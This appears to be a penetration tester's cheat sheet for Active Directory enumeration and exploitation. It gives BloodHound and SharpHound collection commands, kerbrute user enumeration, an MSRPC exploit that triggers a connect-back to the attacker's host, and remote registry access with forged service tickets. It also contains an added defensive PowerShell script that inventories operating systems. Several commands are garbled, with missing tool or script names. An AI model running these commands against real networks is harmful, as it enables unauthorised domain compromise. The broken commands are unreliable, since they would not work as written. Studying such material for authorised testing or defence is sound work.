Domain Enum & Exploitation



SharpHound.exe -c all,gpolocalgroup

Via Covenant

Assembly /assemblyname:"winsrv" /parameters:"\"-c All GPOLocalGroup\""

Via Impacket

bloodhound-python -c all -u <user> -p <password> -d <domain> -dc <> -ns <optional nameserver>

Sometimes this results in a DNS timeout; in that case we can use

sudo sh -c 'python3 --fakeip <dc ip> --fakedomains <domain> -q'


ACLight is a great script that finds highly privileged accounts by using PowerView and then creates a report.

Find OS Versions

Get-ADComputer -Filter {OperatingSystem -like '*Server 2012*'} -Properties IPv4Address, whenCreated, OperatingSystem | Sort-Object DNSHostName | Select-Object DNSHostName, IPv4Address, whenCreated, OperatingSystem
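The query above shows one OS pattern; as an added example (not from the original notes), the script below runs a single query for the whole domain, summarises how many hosts run each OS and flags legacy builds, which is the inventory a defender wants when planning decommissions. It assumes the ActiveDirectory RSAT module is installed; the $LegacyPatterns list and the Test-LegacyOs helper are assumptions of this example.

```powershell
Import-Module ActiveDirectory

# Wildcard patterns treated as legacy/unsupported; this list is an assumption for
# the example, adjust it to the builds your organisation has retired
$LegacyPatterns = @('*Server 2008*', '*Server 2012*', '*Windows 7*', '*Windows 8*')

# Helper (assumed, not part of the page): does an OperatingSystem string match a legacy pattern?
function Test-LegacyOs {
    param([string]$OperatingSystem)
    foreach ($pattern in $LegacyPatterns) {
        if ($OperatingSystem -like $pattern) { return $true }
    }
    return $false
}

# One query for the whole domain, requesting only the attributes we display
# instead of -Properties * (far cheaper for the domain controller)
$computers = Get-ADComputer -Filter * -Properties OperatingSystem, IPv4Address, whenCreated, LastLogonDate

# 1. Summary: how many hosts run each OS, legacy builds flagged
$computers |
    Group-Object -Property OperatingSystem |
    Sort-Object Count -Descending |
    Select-Object @{n='OperatingSystem'; e={ if ($_.Name) { $_.Name } else { '<unset>' } }},
                  Count,
                  @{n='Legacy'; e={ Test-LegacyOs $_.Name }} |
    Format-Table -AutoSize

# 2. Detail: the legacy hosts themselves, in the same column layout as the page's query
$computers |
    Where-Object { Test-LegacyOs $_.OperatingSystem } |
    Sort-Object OperatingSystem, DNSHostName |
    Select-Object DNSHostName, IPv4Address, whenCreated, LastLogonDate, OperatingSystem |
    Format-Table -AutoSize
```

Hosts with an empty OperatingSystem attribute show up as `<unset>` in the summary; they are worth a look too, since a computer object that never populated the attribute is often stale.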



kerbrute userenum -d <domain> <userlist> --dc <>


Exploit a flaw in MSRPC to get a connect-back from a vulnerable server via

python <domain>/<user>@<rhost> <lhost>

Read Remote Registry

We can read a remote machine's registry with a Service Ticket (which can be generated with "" if we have the creds or hash of a user) and "runas /netonly". This only works if the user we are targeting has a session on the target system (check in BloodHound).
